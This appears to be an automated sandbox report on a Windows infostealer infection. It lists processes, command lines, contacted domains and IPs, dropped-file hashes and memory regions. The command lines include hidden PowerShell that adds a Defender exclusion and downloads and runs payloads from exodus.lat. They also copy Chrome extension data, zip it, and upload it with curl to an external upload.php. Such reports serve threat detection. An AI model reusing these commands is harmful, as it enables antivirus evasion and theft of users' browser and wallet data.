"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4072 -childID 2 -isForBrowser -prefsHandle 4068 -prefMapHandle 4064 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2c2faae5-e6b3-470e-a273-b0c0cad259e2} 3052 "\\.\pipe\gecko-crash-server-pipe.3052" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4632 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4568 -prefMapHandle 4652 -prefsLen 29197 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {02c7e711-1a46-4011-94b1-1d3deff31a8d} 3052 "\\.\pipe\gecko-crash-server-pipe.3052" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5340 -childID 3 -isForBrowser -prefsHandle 5224 -prefMapHandle 5336 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4555eac6-62a4-4a96-98e7-b536232e2408} 3052 "\\.\pipe\gecko-crash-server-pipe.3052" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5468 -childID 4 -isForBrowser -prefsHandle 4624 -prefMapHandle 5296 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ac1882f2-5bcc-494a-99cf-62d31d84896d} 3052 "\\.\pipe\gecko-crash-server-pipe.3052" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5664 -childID 5 -isForBrowser -prefsHandle 5740 -prefMapHandle 5736 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5cbe0ce6-b8af-4378-a25b-b9ea9ddce40e} 3052 "\\.\pipe\gecko-crash-server-pipe.3052" tab

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\download.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"

C:\Users\Admin\AppData\Local\Temp\smartscreen.exe

"C:\Users\Admin\AppData\Local\Temp\smartscreen.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\runsteal.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat"

C:\Windows\SysWOW64\xcopy.exe

xcopy /E /I "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"

C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe

"C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org

C:\Windows\SysWOW64\curl.exe

curl -s https://api.ipify.org

C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe

"C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip'"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c curl -F "file=@C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip" "https://exodus.lat/files/upload.php"

C:\Windows\SysWOW64\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip" "https://exodus.lat/files/upload.php"

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
RU 185.215.113.43:80 185.215.113.43 tcp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 43.113.215.185.in-addr.arpa udp
RU 31.41.244.11:80 31.41.244.11 tcp
US 8.8.8.8:53 11.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 16.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 atten-supporse.biz udp
US 172.67.165.166:443 atten-supporse.biz tcp
US 8.8.8.8:53 166.165.67.172.in-addr.arpa udp
NL 92.63.197.221:80 tcp
US 8.8.8.8:53 se-blurry.biz udp
US 104.21.81.153:443 se-blurry.biz tcp
US 8.8.8.8:53 zinc-sneark.biz udp
US 104.21.62.142:443 zinc-sneark.biz tcp
US 8.8.8.8:53 153.81.21.104.in-addr.arpa udp
US 8.8.8.8:53 142.62.21.104.in-addr.arpa udp
RU 185.215.113.206:80 185.215.113.206 tcp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 172.67.153.96:443 dwell-exclaim.biz tcp
US 8.8.8.8:53 206.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 formy-spill.biz udp

Files

memory/1056-0-0x0000000000C90000-0x000000000113F000-memory.dmp

memory/1056-1-0x0000000077584000-0x0000000077586000-memory.dmp

memory/1056-2-0x0000000000C91000-0x0000000000CBF000-memory.dmp

memory/1056-3-0x0000000000C90000-0x000000000113F000-memory.dmp

memory/1056-5-0x0000000000C90000-0x000000000113F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

MD5 f25ddb78a2cc3b6442c52a3c4a2aa843
SHA1 52ba6df84b158bf917044fee22625d2a12202382
SHA256 ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4
SHA512 74c7900f42e3d9b5d490e4848c7d12832f14b245065e04baa96604f2ca91ea5e46318ea71e081ee266fc770a94413edc298516abf23ed9f6c7cd6e7a70b72f14

memory/1056-16-0x0000000000C90000-0x000000000113F000-memory.dmp

memory/4924-17-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/4924-18-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/4924-19-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/4924-20-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/4924-21-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/4924-22-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/4924-23-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/4924-24-0x0000000000940000-0x0000000000DEF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe

MD5 a67e34baacfca98f323981d3b0087f3b
SHA1 d22ccae2971df83812acaebc750d9a2c87357fe5
SHA256 6092579a997945b10d3f279693baa004d180417ccfec941c45eb20705a2b4706
SHA512 39c7a33ab14e518a09f4e022c1c61c8b5a88417af3ce5a1769ab8c0fa328a178fcd79a098c4c7f3344df75e2b7cd22ebf6a88d43ad61599c53a3c89d54c29d6d

memory/4924-51-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/4924-52-0x0000000000940000-0x0000000000DEF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Audit

MD5 9da23439e34b0498b82ae193c5a8f3a8
SHA1 ae20bbe7fac03c94e42f4dd206d89003faae7899
SHA256 0f241cc0324871a1a900a7ac0edf889a8d12875b1072f44856cc979a4b7a77ac
SHA512 cd4b262753b4f5f1dac09c20fa64ebdee00cf4a3fce92287a7439df943ea65bdf8569f541c2668b2164139b91facccfb3c98db8ad8f686637f4e317583cc98a2

C:\Users\Admin\AppData\Local\Temp\1012589001\d9c5b97a2f.exe

MD5 623d073b8d01e00cbb5294ff07fe238a
SHA1 c3aeeb4de6cd38209944e7a1c3ecaa3f411f8775
SHA256 ce50862f51244b9dce6dbde2bc96fa852cff8ca84b720797894a3f43f4e293ca
SHA512 dc1fe9e39173bfd1e2722125b1385cf8c15e2570b65c1d5acb320a70d073d39a1a25f3665a87ccb3b8a0aaf7b7e63edb21e8e3cd4c3ac27e9cda237b54979824

memory/3956-140-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012590001\628cb6a5aa.exe

MD5 bd8e9783c400bd3e1062102ea7efc071
SHA1 5de634ac724beb913fc431da4474635969ef4579
SHA256 5892cf800275fb41ba0b88395a14bd8d1ddf35d7bbcdb0e064f7bec4b2eaa894
SHA512 84202fd36089564b54d010ac30508f8e97970802bfc0d87c4957c85f02b82fd4411f776dd1e44d5e78cc91ce9d00651341d69d2bc9f0c17bcc46d4fdf928bfaf

memory/1056-260-0x0000000000530000-0x00000000009D5000-memory.dmp

memory/4924-337-0x0000000000940000-0x0000000000DEF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Commissioner

MD5 6ee7ddebff0a2b78c7ac30f6e00d1d11
SHA1 f2f57024c7cc3f9ff5f999ee20c4f5c38bfc20a2
SHA256 865347471135bb5459ad0e647e75a14ad91424b6f13a5c05d9ecd9183a8a1cf4
SHA512 57d56de2bb882f491e633972003d7c6562ef2758c3731b913ff4d15379ada575062f4de2a48ca6d6d9241852a5b8a007f52792753fd8d8fee85b9a218714efd0

C:\Users\Admin\AppData\Local\Temp\Dentists

MD5 895c5374a042a9e6c78c673690cd2275
SHA1 9dfe1b532f958f678de2bac7c74646e007a8fa14
SHA256 226099aac21e8d4a671a68b37d204339703fb696b6cc5aa30311fb55d6ab2147
SHA512 130af34bb1d12db8e86b930d8e490754687e1381a0104ac4c98cc2f02ff7fc4ed9e1d549121a013e1c32663a00d1dc8eb20d2f9831feb3c7eb17bf61a1d8d52c

C:\Users\Admin\AppData\Local\Temp\Flavor

MD5 d9182f7a263f19b9876e7e1568e6c760
SHA1 d0683b5a7247a2f4a69473165d2c2649f2e1c01f
SHA256 4efff79e94f136f9bbaed62501810937785831b8c10ee9eb675ceae24cf3c4c9
SHA512 85582b94da822580eb26bc477440d87fb0a9ed98e3b75166cd96c2a18c88367c8bdd808fc43c52c2078e625efd81983e9f2e733272289833700649ad58a96a9b

C:\Users\Admin\AppData\Local\Temp\1012591001\91f0bbb4f8.exe

MD5 f18df05d8617aecd511f2074dd84843c
SHA1 9203a2f1b90425ab15b5ca0785b9a406dd9ed37f
SHA256 c898a6d03e65d0e212cca04c6035c9c9a23cfe504f7e72179746709b0a12889a
SHA512 57c729f1f8b4956825e35a153b0a421324a284e688702da43a11eb2cb092aea46cd730e8099d633c54b3b0c212ce8d0a6dcb0a0b12aa4095105c4fb70b89caf1

C:\Users\Admin\AppData\Local\Temp\Disturbed

MD5 0e2df9a4f4d78ad0299f0377d417b39e
SHA1 a2452ab3b04b480dfc2a58a416762e280254751f
SHA256 8834f63f09734b9f284437f26cba4909ce9ae1aceafa27e2bcd7531c1a7479df
SHA512 d8194f24cc02fc030c7cf1dab5970257a79b8bcc887a8ff1ccd104e94ea809dcd266b056c80e6a0e73cba71f81e654389025c939e3135f6fafca9d51737812b8

C:\Users\Admin\AppData\Local\Temp\Artistic

MD5 d35007cc8b2860b1fe9ee861e1f2846d
SHA1 58638fd185601506b3b13fe254065aeb7edff28c
SHA256 de1e4dbe18f0b926b49aceb10157bc7f542409bad6242422efef3b831608a037
SHA512 45f851201656cb19c89274d124a7625a4c9fe12f412616a84458aa1857c61455126264416ff7fa1c9ffa99b994613baecfacd1f8179240a5021c7e5b867ea068

C:\Users\Admin\AppData\Local\Temp\Revenue

MD5 aabc90b85b9c3b51543de0339d29778e
SHA1 299f5e2ca9326e0a5feefb4fc7b05da93cfd11a1
SHA256 9a0a3567f4c9b9ca46fbf41d65cdd5ce464b0efe42d6aaf7cff840addbe05d60
SHA512 3d951489d7d46874909bfd82e9cac346bdd15bbb485fc76e1ed7d6fe7bb51a7649d1f649b75bb6f6f1b6f10ea16113cd01c20aa7ea85d038fcb7fe317082edf3

C:\Users\Admin\AppData\Local\Temp\Soundtrack

MD5 b75737c804ca9949cc63bd42c945a5e6
SHA1 75c0490174adc40d1824b1024021b82dd5c762b7
SHA256 628068ee856d68776d6e9b755cd42d7a5a46af1a2a6a2c22e65db95b5d2d8f2c
SHA512 58fedd2bd6318d4b93de429d184701e059321c16872cafc978837c29985404bf432e4a2701894f7f67045f9684da40c8e14f9f557da3398c5d6eeca2e18faca7

C:\Users\Admin\AppData\Local\Temp\Zip

MD5 84f05dddefb1c72567827be553fe67fe
SHA1 c2ebcc4de3439a8206aa8faac90312bfb207ce4f
SHA256 b7de8d92196f323eb9a6237b9e902461569fd093b36e1988dee9de2ab157bb12
SHA512 99954fa07fe7cc0e54dbd0af09b32507cd998c8b44cb63f1ffe8e30667b6d1bb0949a6c95b60e40e73f0b0bb3f11e79f8fa23f696032118210cd10f03eec2904

C:\Users\Admin\AppData\Local\Temp\Proceeds

MD5 de061b898e12d89c92409f220918347f
SHA1 6b571edab30dcc4d5518e5bebb296d1f7bf5414c
SHA256 70fda66f3ea2607d6cff63d0a6a7258577690d2a9bc5105bb529889ce025d1c2
SHA512 61d94f04572643dc4274aedda51e7cb6bcccefcfa4556e6d87f94195ddf90ffbeb65909688c7bc3407f244021cc6dff0c8692fd7835ee61e6a43a0394a693a2b

C:\Users\Admin\AppData\Local\Temp\Justice

MD5 774df02c553d130dde3aa7496b64ebed
SHA1 e2a4aab8c3b654bd022662045fa70413a80e55f9
SHA256 ae9283c1a14b751639a75592295d85105954b761737ab77fc1e667a1498f2e9e
SHA512 c132cdf383e4fa32362d50768898ed9c6cd1e306056d066168a8ac1ee3ea7953424ff3b241ff1e0376b99b91f566b698bfef07da9bc45471097a6637dc154d11

memory/4976-420-0x00000000006F0000-0x0000000000BEA000-memory.dmp

memory/3956-419-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\491505\B

MD5 0a1e63fc10dd1dbb8b2db81e2388bf99
SHA1 67ad39aabbf4875bc1b165ccd5afc40194d1d3c8
SHA256 122991768f589431b9166a4e22523bf48a53efff73fc2b191955e604196541b7
SHA512 94c50f06e1d157381b9d0746044b5d015e2946b44291d92739783cb3ed9e91371cf7d1b981d3108d910d7a7000810fe69fbe6590f9a84f822b671866ab9db5fc

memory/4976-453-0x00000000006F0000-0x0000000000BEA000-memory.dmp

memory/3956-454-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe

MD5 4a113390d43e07f23b940f5395802b01
SHA1 7451bb1a01bb006b6a69449c45310c23a79ad900
SHA256 cf265dc6c405c9d0b3e48728139c6dac24a04840091a315c34b8f7852a2f517b
SHA512 b37c7a7eea7a992f363b8a58f069b13f4c8936f8cc2037e86c57fa5b56b3a7195d7816fd91db6e14f2bdbda30898e374b6dcc839adb94c475a7c19f50f9f9f02

memory/1056-477-0x0000000000530000-0x00000000009D5000-memory.dmp

memory/1056-478-0x0000000000530000-0x00000000009D5000-memory.dmp

memory/4880-480-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/4880-482-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/4924-483-0x0000000000940000-0x0000000000DEF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe

MD5 159fd820eec2647575a520c273e83c4c
SHA1 83d9f35adee5e6129083df1c035840e796496faa
SHA256 49bf2a693d8813f89a4cbea5e6d76f032f6120a40b5ccfb0d439f0eb23e24b39
SHA512 5fbc084b754c573147583c5be13a32f0a138a0e3b63edf5eedb8993c21585a32ed015e6eb564d411c90147789603a1a1b0532882394d1f2d39604b1260bef2ee

memory/3196-502-0x0000000000630000-0x00000000008EC000-memory.dmp

memory/3196-503-0x0000000000630000-0x00000000008EC000-memory.dmp

memory/3196-504-0x0000000000630000-0x00000000008EC000-memory.dmp

memory/1056-506-0x0000000000530000-0x00000000009D5000-memory.dmp

memory/3956-508-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\85mw8mk9.default-release\activity-stream.discovery_stream.json.tmp

MD5 a678499d9e8c39e69233e263d73d3391
SHA1 4a2bc73b6ed2daaf8c2eb8fe0139719fd3d12377
SHA256 f88a2bc670df6a43025ab69138fabea4344f5e2d36fd3f69040f60895b458510
SHA512 f4f29807bb9ebdeb00ee9923c7d4c2a3fe05246f19c6473048ff5924c8418ae20af60931f4e0153a3b3f0f0dde1635dfbebe9efb3f5359d03b0f24d8b313e3aa

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\datareporting\glean\db\data.safe.tmp

MD5 8cfb8ce1a4be9b80dffd957c6246d450
SHA1 9b49ad5ae3606664e7f078b785c0f49dfb1ba6ab
SHA256 a17ebe51f44f2badd79038b8dbcec2e8048253de32b194ecfa5f7e76ad0fde9e
SHA512 f65735adf483e21b40b124dbe4cc528b6df54658834ab873be4148f5f36491af5beb8dac7e3c2a02f568127f4401f87b560a030bcf51af5596676c490a032cfd

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\datareporting\glean\pending_pings\42ec8a01-e3b2-4c0b-961c-0694afd3056a

MD5 212c0036733e86fcbb127820f7353de2
SHA1 fc8716214f84648632b7d5510566d7916f6b3d6e
SHA256 4d9fbc6840bc383c5942ea1326880930eed92c27b2557ff813404f4ba85573be
SHA512 05550238af2badab78df21d668cbf8f2f3af17efefca885b4a4647944c183308dad59883f45af0c57c193c62d67dd59f3ec3029d474f041aef213a15dcab4505

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\datareporting\glean\pending_pings\bb10be38-70f8-4728-ab9b-b68bf2b93fee

MD5 b1a92cf9d121eede5ee57fd107afe61a
SHA1 0303eb15a5c4adc3538f23773fdc66c3ec3810d3
SHA256 accd80c976e27730102c220d479e219adab1c0868a89a33ce7598b47735e8306
SHA512 6042ab754e9a31f52f63b07427a10a45e3c2510aafa0b3f50e5060d486eadf60d5677e0b64ea65cfcddcf3cf39a18f6bc205fabd5067cdc2ef116a5c9d06727a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\AlternateServices.bin

MD5 50acef891911afd2587ab66c4baf8494
SHA1 6c2aef5a2c357aef052bf2646606b85e434258cc
SHA256 ca9257cd292091cc9efa0e4a25aeffed9541b54e8cb153f48440093caf8f1427
SHA512 be594d0ecd02306f67abf64cc77a4495876145ff2b9851ab7aa109f8414a7d83927fa0a87198f8f4d374e5c4c0607f1537afb7a38a449fd06f94ce21f784ef4f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\prefs.js

MD5 c24cfa12c04c2a51386b08b08d3d25e8
SHA1 8ae7b50b15df68892e321b7b599e2bf11a7d65c4
SHA256 2c44f524ebe8e2b8b3586f57bd9f23f4264528d6758f38b7488199079a66e692
SHA512 fc06923ffd09b0120563ab4369f7e5794d77b329a761c7434e62a147d85308ec88e2b818240251e82e9f8d9eab17243121ffee1ad25e1f676ba5c0f515fb2176

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\85mw8mk9.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

MD5 96c542dec016d9ec1ecc4dddfcbaac66
SHA1 6199f7648bb744efa58acf7b96fee85d938389e4
SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512 cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\prefs.js

MD5 bbce068d5657afc4c5f5a283e89b7a0b
SHA1 c8b8ccc5cd4316066dbe7f2de5414f2ddb28364d
SHA256 bbb839c1146de172a1fa06a60c24ffb2f82f66c9cc9a8d68cf9313b68e5d8954
SHA512 24fbd68b79a8b22ce22e32572c1892ee0f2b47ea43e0814d35a4b6d853ec203db9c00cae5010b87478fcb2ce6a257c425ed526dd7ec89b103e7d39cef394247f

memory/4924-834-0x0000000000940000-0x0000000000DEF000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\prefs-1.js

MD5 fc06e482610963b3dfc433d009ee864a
SHA1 17c7cb8d1ac199f9ee7f496a20059c38a9b686c9
SHA256 24f8e9c836f85316a5be50905f34eba3ff16826ba5ec710d5d80d1ab2d895585
SHA512 17c02a2176b93f80e59417f1b1043c1e7393e7e7894be0159e7b1db339153695925e3674994b98afcb67de5d2db8d61bc0b9d1f4e55a3b61e7ca251c395f5bd6

memory/3196-871-0x0000000000630000-0x00000000008EC000-memory.dmp

memory/3196-875-0x0000000000630000-0x00000000008EC000-memory.dmp

memory/3956-876-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/4924-888-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/3956-893-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\datareporting\glean\db\data.safe.tmp

MD5 507850023a4693c91c2e02d1a5300a43
SHA1 2b65034d79ee54842ae7b996224ec00077e0ddc3
SHA256 5099d110ba10ba1e5e336ba890ae862c4b92b30e0f640af8bfaf56b47c1b6bca
SHA512 9518fcca07c0f6e771d7be82b5c2ccd925061d147dfeca85a1801eef475106ffff35b3431eb26df95fb1ab5d163811852917685fe6e105c441656fabd1447b3e

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\prefs-1.js

MD5 fa8e66edf858fed3afd8f1c33bf664b3
SHA1 34ac9ed76881652050f25f2654fe10a1dcc37bce
SHA256 67d0ed4ed2c4a57e9407820ca78927e25a13ec1fe3d493da29bd55d5a0f27f07
SHA512 904feb1739771df25a6ef70636d4b0b5cdb17daff4a2a2f78645fd507229633cd2bafad8a6827207bcf90d7656836fbdce6c60ad4aa0b2c8ea3214308900377f

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\85mw8mk9.default-release\cache2\entries\92F4D5A4F9CED6E2E644D803AEE3647A0EA4D984

MD5 5fc38fd42feec29028de742cca254405
SHA1 9855e554853fa462bd98b6abc64fa94ba600e0c3
SHA256 02800a8f4305db301d4e72dea9914d2e74f0049c53da226f558ae7d50d93a306
SHA512 7acf2926e17aeb7e96ac7b7a12211697496f22b719a329539a3923d76a8175fa0fb1463eeddcec3454efceeab9b2e47bf72d99bad4e61d9c227ec1e0b86458b2

memory/4924-1014-0x0000000000940000-0x0000000000DEF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

memory/3956-1197-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\prefs-1.js

MD5 dc54a77b3d68c4b74a535bb81a5b1559
SHA1 26b8318849c943c467423d4187e1ba0e1d27231c
SHA256 f30296c6ae7013f2b2be48332ab9f4097101063d2cce49900e42a014d5bfbaee
SHA512 f699d0e6beb7214f11ee7a1c473a606f476ba53350fc8f9c8895ce56bf89e400e9192623e493b892ca0d2d434556e4089228c907612a97280c8ca63569534ce3

memory/4924-1626-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/3956-2142-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/4924-2619-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/3956-3152-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/5540-3492-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/5540-3494-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/4924-3495-0x0000000000940000-0x0000000000DEF000-memory.dmp

memory/3956-3501-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/4924-3502-0x0000000000940000-0x0000000000DEF000-memory.dmp

